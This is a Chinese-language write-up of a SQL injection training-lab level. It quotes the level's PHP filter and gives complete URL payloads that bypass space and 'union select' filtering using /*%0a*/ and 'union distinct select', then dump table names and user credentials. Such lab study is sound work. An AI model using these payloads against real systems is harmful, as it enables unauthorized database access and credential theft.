1. 题目分析
首先题目告诉我们会吃掉我们的union
和select
。
然后通过?id=1')%26%261=1;%00
测试出来,id的是被('')
包裹的。
接着看一下源码的blacklist
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
这里过滤了/*
,--
,#
,空格,以及不区分大小写的union+select
。
这里由于存在空格过滤,因此可以使用一些特殊的空白字符%a0
来代替空格进而绕过空格过滤。之前在less27也说过,由于环境的原因,像%a0
这类的特殊字符在windows
平台上不能有效的使用。
但是,最近又发现了一个新的绕过空格过滤的方法,可以使用/*%0a*/
,这个东西用于SQL语句中,也会被翻译成空格。
2. 注入思路
本关,我们就采用联合注入这一手段。
有两个关键点:
- 绕过空格使用
/*%0a*/
- 绕过
union select
过滤,由于源代码的过滤机制是只有碰到union
连着select
的时候才会过滤,因此我们使用union distinct union
进行绕过。
3. 注入过程
payload
?id=0%27)/*%0a*/UniOn/*%0a*/distinct/*%0a*/SeLecT/*%0a*/1,2,3;%00
爆表:
?id=0%27)/*%0a*/UniOn/*%0a*/distinct/*%0a*/SeLecT/*%0a*/1,(select(group_concat(table_name))from(information_schema.tables)where(table_schema="security")),(select(group_concat(column_name))from(information_schema.columns)where(table_schema="security"%26%26table_name="users"));%00
查users
的值
?id=0%27)/*%0a*/UniOn/*%0a*/distinct/*%0a*/SeLecT/*%0a*/1,(select(group_concat(username))from(users)),(select(group_concat(password))from(users));%00
后面的28a的话,依然可以使用本关的payload
。
4. 小结
这次通关的做法,主要是学习了两个绕过机制。
使用/*%0a*/
去绕过空格过滤。
使用union distinct select
绕过union select
过滤。
从而实现了最终的联合注入。